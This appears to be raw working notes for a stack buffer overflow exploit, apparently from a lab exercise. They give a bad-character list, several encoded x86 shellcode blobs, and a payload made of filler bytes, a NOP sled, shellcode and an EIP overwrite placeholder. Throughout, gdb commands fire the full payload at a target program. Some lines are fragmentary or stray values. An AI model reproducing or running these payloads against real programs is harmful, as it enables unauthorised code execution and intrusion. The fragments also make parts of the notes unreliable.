\x00\x09\x0a\x20
"\xda\xca\xba\xe4\x11\xd4\x5d\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x12\x31\x50\x17\x03\x50\x17\x83\x24\x15\x36\xa8\x95\xcd\x41"
\xad\xec\xa0\x04\x5a\x22\xa2"
0xfffffffff
F A9AA AAAE
0xfa9aaaaae
Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
NOPs = "\x90" * 124
Shellcode = "\xd9\xeb\xd9\x74\x24\xf4\xb8\x5d\x41\x80\x61\x5b\x2b\xc9\xb1\x12\x31\x43\x17\x03\x43\x17\x83\xb6\xbd\x62\x94\x79\xe5\x94\xb4\x2a\x5a\x08\x51\xce\xd5\x4f\x15\xa8\x28\x0f\xc5\x6d\x03\x2f\x27\x0d\x2a\x29\x4e\x65\xa7\xc3\xbe\x52\xdf\xd1\xbe\x8a\x31\x5f\x5f\x02\x2b\x0f\xf1\x31\x07\xac\x78\x54\xaa\x33\x28\xfe\x5b\x1b\xbe\x96\xcb\x4c\x6f\x04\x65\x1a\x8c\x9a\x26\x95\xb2\xaa\xc2\x68\xb4"
EIP = "\x66" * 4
(gdb) run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xd9\xeb\xd9\x74\x24\xf4\xb8\x5d\x41\x80\x61\x5b\x2b\xc9\xb1\x12\x31\x43\x17\x03\x43\x17\x83\xb6\xbd\x62\x94\x79\xe5\x94\xb4\x2a\x5a\x08\x51\xce\xd5\x4f\x15\xa8\x28\x0f\xc5\x6d\x03\x2f\x27\x0d\x2a\x29\x4e\x65\xa7\xc3\xbe\x52\xdf\xd1\xbe\x8a\x31\x5f\x5f\x02\x2b\x0f\xf1\x31\x07\xac\x78\x54\xaa\x33\x28\xfe\x5b\x1b\xbe\x96\xcb\x4c\x6f\x04\x65\x1a\x8c\x9a\x26\x95\xb2\xaa\xc2\x68\xb4" + "\x66" * 4')
"\xd9\xeb\xd9\x74\x24\xf4\xb8\x5d\x41\x80\x61\x5b\x2b\xc9\xb1\x12\x31\x43\x17\x03\x43\x17\x83\xb6\xbd\x62\x94\x79\xe5\x94\xb4\x2a\x5a\x08\x51\xce\xd5\x4f\x15\xa8\x28\x0f\xc5\x6d\x03\x2f\x27\x0d\x2a\x29\x4e\x65\xa7\xc3\xbe\x52\xdf\xd1\xbe\x8a\x31\x5f\x5f\x02\x2b\x0f\xf1\x31\x07\xac\x78\x54\xaa\x33\x28\xfe\x5b\x1b\xbe\x96\xcb\x4c\x6f\x04\x65\x1a\x8c\x9a\x26\x95\xb2\xaa\xc2\x68\xb4"
"\xbe\x16\xc1\x29\xb2\xd9\xce\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x12\x83\xc3\x04\x31\x73\x0e\x03\x65\xcf\xcb\x47\xb8\x14\xfc\x4b\xe9\xe9\x50\xe6\x0f\x67\xb7\x46\x69\xba\xb8\x34\x2c\xf4\x86\xf7\x4e\xbd\x81\xfe\x26\x41\x72\x01\xb7\xd5\x70\x01\xcd\x4c\xfc\xe0\x81\xe9\xae\xb3\xb2\x46\x4d\xbd\xd5\x64\xd2\xef\x7d\x19\xfc\x7c\x15\x8d\x2d\xac\x87\x24\xbb\x51\x15\xe4\x32\x74\x29\x01\x88\xf7"
(gdb) run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xbe\x16\xc1\x29\xb2\xd9\xce\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x12\x83\xc3\x04\x31\x73\x0e\x03\x65\xcf\xcb\x47\xb8\x14\xfc\x4b\xe9\xe9\x50\xe6\x0f\x67\xb7\x46\x69\xba\xb8\x34\x2c\xf4\x86\xf7\x4e\xbd\x81\xfe\x26\x41\x72\x01\xb7\xd5\x70\x01\xcd\x4c\xfc\xe0\x81\xe9\xae\xb3\xb2\x46\x4d\xbd\xd5\x64\xd2\xef\x7d\x19\xfc\x7c\x15\x8d\x2d\xac\x87\x24\xbb\x51\x15\xe4\x32\x74\x29\x01\x88\xf7" + "\x66" * 4')